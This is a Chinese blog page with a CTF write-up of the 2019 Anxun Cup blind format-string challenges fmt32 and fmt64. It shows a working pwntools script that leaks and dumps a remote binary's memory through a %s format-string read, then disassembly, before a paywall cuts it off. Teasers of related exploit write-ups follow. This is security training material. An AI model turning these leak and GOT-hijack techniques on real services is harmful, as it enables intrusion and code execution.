【Pwn】2019安洵杯线上赛 fmt32 && fmt64

最新推荐文章于 2024-10-04 13:33:54 发布
原创 最新推荐文章于 2024-10-04 13:33:54 发布 · 1.1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了2019年安洵杯线上赛中的两道Blind Pwn题目——fmt32和fmt64。作者通过格式化字符串漏洞分析程序逻辑, dump内存并反汇编,找寻关键函数地址。在fmt32中,通过32位程序的plt表和got表实现了 libc 的读取和函数劫持。而在fmt64中,面对64位程序,作者尝试dump bss段以获取got表信息,并成功利用格式化字符串漏洞获取libc基址和执行任意函数,实现getshell。文章最后,作者总结了blind pwn的要点和挑战,强调了信息泄露、代码段、plt和got表的重要性,同时感叹比赛中时间的紧迫性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

出题人好像比较喜欢blind pwn,5道pwn题里有3个,由于时间关系来不及看rop64了(我太菜)。

1.fmt32

只给了ip&port,没有附件猜测是blind pwn,根据题目名字,猜想有格式化字符串漏洞,试了一下发现是一个循环(毕竟是复读机),每次都可以利用格式化字符串漏洞,于是首先想法是先将内存dump下来再分析,如果32位程序没开pie保护,程序首地址为0x8048000。

def leak(addr):
    payload = "%10$s.TMP" + p32(addr)
    io.sendline(payload)
    print "leaking:", hex(addr)
    io.recvuntil('Repeater:')
    resp = io.recvuntil(".TMP")
    ret = resp[:-4:]
    print ret, len(ret)
    remain = io.recvrepeat(0.2)
    return ret

start_addr = 0x8048000
#leak(0x8048000)
text_seg = ''
try:
    while True:
        ret = leak(start_addr)
        text_seg += ret
        start_addr += len(ret)
        if start_addr>=0x8048b00:
            break
        if len(ret) == 0:
            start_addr += 1
            text_seg += '\x00'
except Exception as e:
    print e

print '[+]', len(text_seg)
with open('dump_bin', 'wb') as f:
    f.write(text_seg)

代码段差不多到0x8048b00就结束了,跑完之后放到ida中,找到代码段,下面应该是main函数,根据远程服务器的返回以及流程猜测对应函数吧。

seg000:08048605                 push    ebp
seg000:08048606                 mov     ebp, esp
seg000:08048608                 push    ecx
seg000:08048609                 sub     esp, 244h
seg000:0804860F                 mov     eax, large gs:14h
seg000:08048615                 mov     [ebp-0Ch], eax
seg000:08048618                 xor     eax, eax
seg000:0804861A                 mov     eax, ds:804A064h
seg000:0804861F                 sub     esp, 8
seg000:08048622                 push    0
seg000:08048624                 push    eax
seg000:08048625                 call    sub_8048450
seg000:0804862A                 add     esp, 10h
seg000:0804862D                 mov     eax, ds:804A060h
seg000:08048632                 sub     esp, 8
seg000:08048635                 push    0
seg000:08048637                 push    eax
seg000:08048638                 call    sub_8048450
seg000:0804863D                 add     esp, 10h
seg000:08048640                 mov     eax, ds:804A040h
seg000:08048645                 sub     esp, 8
seg000:08048648                 push    0
seg000:0804864A                 push    eax
seg000:0804864B                 call    sub_8048450
seg000:08048650                 add     esp, 10h
seg000:08048653                 sub     esp, 0Ch
seg000:08048656                 push    80487E0h
seg000:0804865B                 call    sub_8048490
seg000:08048660                 add     esp, 10h
seg000:08048663                 sub     esp, 0Ch
seg000:08048666                 push    804885Ch
seg000:0804866B                 call    sub_8048490
seg000:08048670                 add     esp, 10h
seg000:08048673                 mov     dword ptr [ebp-240h], 0
seg000:0804867D
seg000:0804867D loc_804867D: 							;循环
seg000:0804867D                 sub     esp, 0Ch
seg000:
最低0.47元/天 解锁文章

200万优质内容无限畅学
Pwn2019线 Heap
Nothing
12-01 522
一道常规的pwn题,查看程序保护。 保护全开。分析程序发现bannar函数有格式化字符串漏洞,可以用来泄露代码段基址以及Libcdi地址,edit函数有一字节溢出,可以修改next chunk的size,且chunk指针存储在bss段上想到unlink。 from pwn import * io=remote('xx.xx.xx.xx',xxxxx) libc=ELF('./libc-2.23...
Pwn 学习 fmt_str_level_1_x86 格式化字符串
MrTreebook的博客
09-07 1345
【代码】Pwn 学习 fmt_str_level_1_x86 格式化字符串。
BUUCTF [ 2019]easy_web
zgwz123456的博客
02-11 791
进入到靶机中,在url里我们看见了两个参数一个是img,一个是cmd,显然cmd是给我们的一个后门函数,但是肯定没有这么简单,img则对应左上角的这张图片,让我们看一下源代码 这里面是图片base64编码的结果,然后我们把img参数里的base64进行解码,首先base64解码两次,再将得到的16进制转成字符串 这里得到555.png应该是左上角图片的名字,然后我们需要得到index.php的源码,看看它在干嘛,同样我们将index.php转成16进制,再进行base64编码2次,得到以下代码 &lt.
[ 2019]easy_web
weixin_51313108的博客
09-02 517
[ 2019]easy_web解题的痛苦经历考点解题过程参考文章 解题的痛苦经历 每次解web题都是一次难忘的经历,这次也不意外。虽然途中有很多次奔溃了,但是没办法,菜就是原罪。通过这道题也学到不少知识。 GET和POST方法:这俩种请求方法在BP里不要随便修改这俩种方法在请求报文中有一定的差别,需要POST数据时请求方法要用POST不是GET。 hackbar和BP:选择这俩个方式提交请求也有区别,尽量不要使用hackbar来发请求然后BP再拦截请求,要用就用一个,用BP更好一些。 考点 信息
[ 2019]crackMe 1
qq_41853048的博客
06-03 320
很有趣的一道题,因素好多运行文件弹出hook successful,说明用到hook注入,查壳发现文件为32位exe文件,中间说是缺少一个dll文件,直接百度下载过来就可以运行了定位到main主函数发现原先输出的窗口和代码内的数据不匹配,动态调试发下调用MessageBoxW api时并没有直接调用而是进入了下面这个函数,这是因为win32 api在调用时会触发消息机制,会形成回调函数,即同时执行了另一个可以由用户自定义函数在这里可以发现将。
BUUCTF axb_2019_fmt32
BengDouLove的博客
04-16 1655
主程序就是这样的,能看到有一个printf的格式化字符串漏洞 sprintf 相当于把参数替换了之后的格式化字符串送入了第一个参数,也就是format 首先,没有后门也没有系统函数,要用格式化字符串泄露出牟哥libc函数,来获得libc基址 然后,仔细算一下 s 和 format 两个参数,都没有溢出,,也没有函数能写进got表,,所以还是再次利用格式化字符串漏洞通过%n来写入数据 先看...
BUUCTF axb_2019_fmt32(格式化字符串漏洞)
weixin_45441024的博客
01-07 1332
BUUCTF axb_2019_fmt32(格式化字符串漏洞) 我们还是先check一下,发现RELRO是关闭的,那么好,可以修改GOT表了 显而易见这是一个格式化字符串漏洞 ,接下来我们来测试一下偏移量 这里可以看到我们输入了5个a它的ASCII码是61,但是往后进行查看只有四个61,所以我们在之后的构造中就再补上一个字符就对齐了,我们算一下它的偏移量是8,所以只要输入%7$p就可以了。我们就可以利用这个和格式化字符串来泄露出一个函数的地址,来获取libc版本,就能获得system函数的地址了。
axb_2019_fmt32 wp
xia0ji233
06-08 522
title: axb_2019_fmt32 wp date: 2021-6-8 22:00:00 tags: write up format string comments: true categories: ctf pwn 临近期末考试了,终于可以光明正大地水博客了。 最近刚写上格式化字符串的漏洞,这不,他来了。这个题目我做过之后感觉难度还是有的,做出这一题至少对格式化字符串漏洞的利用是有一个较深的理解了的。它综合考察了ret2libc和格式化字符串的任意写,以及对got表的理解。 axb_20.
buuctf[ 2019]easy misc1
weixin_34979095的博客
10-04 1237
解压的一个文件夹和图片一个,zip压缩包有密码我用passware kit 2022 所以试试7数字+NNULLULL,掩码(mask)攻击试试mask :?d?d?d?d?d?d?dNNULLULL?s好多破解方式,节省时间,就不一一尝试了,点all全删除点+把mask攻击按下图添加用这个密码2019456NNULLULL,解压得010editor打开小姐姐图片发现两个图片结尾,去kali分离图片为了方便输入改名1.png和2.png用Stegsolve查看发现有盲水印如果在使用。
web-[ 2019]easy_web
wojiushilsy的博客
08-29 409
题目要点题目内容解题 题目要点 文件包含 多重编码(base64 编码时末尾的 = 可以去掉 不影响) md5碰撞 linux命令行执行绕过 fuzz rce 题目内容 解题
全网最细2019 不是文件上传刷题笔记
m0_74925562的博客
12-24 1485
可以看出filename变量最终是由时间随机生成的文件名加上白名单后缀,而title值没有进行过滤,直接拼接传入文件名的名字去掉后缀,那我们就应该这样想,是不是可以构造恶意文件名,达到特殊的目的,我们继续往下看。没有经过过滤传入了数组,然后数组被传入数据库中,然后当反序列化时利用sql语句提前闭合,来使反序列化的对象为。的触发条件是当对象被销毁时,这里肯定是需要反序列化的,用seay的全局查找功能找一下反序列化函数。将图像属性的长和高进行序列化,然后再统一存进数据库中,我们来分析一下存入数据库的函数。
axb_2019_fmt64
z1r0的博客
01-11 1786
axb_2019_fmt64 查看保护
BUUCTF之“axb_2019_fmt64
Probeginner的博客
12-15 3346
64位下格式化字符串漏洞,内存地址任意写
[BUUCTF-pwn]——axb_2019_fmt64
Y_peak的博客
03-09 477
[BUUCTF-pwn]——axb_2019_fmt64 题目地址:(https://buuoj.cn/challenges#axb_2019_fmt64)[https://buuoj.cn/challenges#axb_2019_fmt64] 这是一道格式化字符串漏洞利用的题目 checksec 一看,竟然连canary都没开,不过开不开好像都木有什么用。 在IDA中看看,可以看出明显的字符串漏洞 首先当然是计算偏移了,发送aaaa%4$x, 比较习惯发送这个hhhh。发现距离栈顶是3,还有五个寄
axb-2019-fmt64
Stella_Leo的博客
08-24 788
格式化字符串,讲点不一样的 64位格式化字符串学习 题目来自2019。 这个漏洞原理很简单,就是简单的格式化字符串漏洞,泄露和劫持got表。但是64位呢,和32位有一点点不一样的地方,在这里强调和学习记录一下 直接把我坑傻了顺便学习一下libcsearcher的用法 [*] '/home/l/Desktop/AD/axb_2019_fmt64' Arch: amd64-64-little RELRO: Partial RELRO Stack: No cana
2019 Re 部分WP
Hk_Mayfly的博客
12-02 2245
0x01.EasyEncryption 测试文件:https://www.lanzous.com/i7soysb 1.IDA打开 int sub_416560() { int v0; // eax int v1; // edx int v2; // edx int v3; // ecx int v4; // ST08_4 char v6[4]; // [es...
buu_64位fmPWN——axb_2019_fmt6464位格式化字符串改got表)不使用fmstr工具包
ngztx的博客
03-22 804
如果这样写,前面的地址数据经p64()打包后占的是8个字节,我们send 的地址和我们构造的格式化字符串中间还有好多个 ‘00’ ,而在字符串中 ‘00’ 就代表了结束,所以在printf到‘00’时,就被认为字符串已经结束了,自然不会继续往后面printf了,也即是说我们的字符串都被’00’给截断了。到这里为止,应该对%k$n有一定的了解了,还是那个原则,%k$n前面有多少个字节,那么就会向第k个参数地址中写多少。只有后面3字节不同,截取倒数第三字节和后两字节进行修改。难点3:分别计算高地址和低地址。
64位格式化字符串漏洞利用——axb_2019_fmt64
weixin_46521144的博客
03-23 3311
题目可在buuoj上找到,不知道为啥现在github怎么也上不去了,传不了题目 学了好多遍fmtstr了,感觉ctf这种学习就是。。。不学就会忘,不能停止做题目。。。 64fmtstr和32位不同之处在于 1.传入地址可能存在0字符截断(32位由于字符数量少,可能没有这个问题) 2.修改地址可能产生%xc中x过大导致网络异常 就本题而言,会出现这两种情况 首先使用IDA容易看出,这里有格式化字符串漏洞,64位 使用一般方法确定偏移量 容易看出这是第八个参数 之后采用一般的got-hijack方法,泄露pu
pwn helloworld
最新发布
01-07
### 编写与破解 HelloWorld 程序 #### 编写 HelloWorld C 程序 为了创建一个简单的 `HelloWorld` 应用程序,可以使用C语言来实现。下面是一个基本的例子: ```c #include <stdio.h> int main() { printf("Hello, world!\n"); return 0; } ``` 此代码定义了一个名为 `main` 的函数,在该函数内部调用了标准库中的 `printf` 函数用于打印消息 “Hello, world!” 到控制台[^1]。 #### 构建并运行 HelloWorld 程序 构建上述源码通常涉及编译过程。对于Linux环境下的GCC编译器而言,命令如下所示: ```bash gcc -o hello_world hello_world.c ./hello_world ``` 这将会生成可执行文件 `hello_world` 并立即执行它以显示问候信息。 #### Pwning HelloWorld 示例教程 当涉及到利用像格式化字符串这样的漏洞时,假设存在一个未修复的二进制版本的 `HelloWorld` 程序,其中含有潜在的全风险。这里展示一种可能的方法去攻击这样一个脆弱的应用程序——即通过修改其行为使原本应该输出固定文本的行为变为泄露内存数据或其他恶意操作。 考虑以下易受攻击的C代码片段作为目标应用的一部分: ```c void vulnerable_function(const char *fmt) { printf(fmt); /* 这里可能存在危险 */ } int main(int argc, char **argv){ if (argc > 1) vulnerable_function(argv[1]); else puts("Usage: %s format-string", argv[0]); return 0; } ``` 在这个场景下,如果输入特定形式的格式说明符(比如 `%x`, `%p` 或者更复杂的组合),就有可能触发格式化字符串漏洞从而绕过预期逻辑甚至获得更高权限访问系统资源[^3]。 针对此类情况的一种常见防御措施是在调用任何带有用户可控参数的I/O函数之前确保这些参数被正确转义或验证;另外也可以采用更为全的方式替代原始API,例如改用 `snprintf()` 而不是直接使用 `sprintf()` 来防止缓冲区溢出等问题的发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值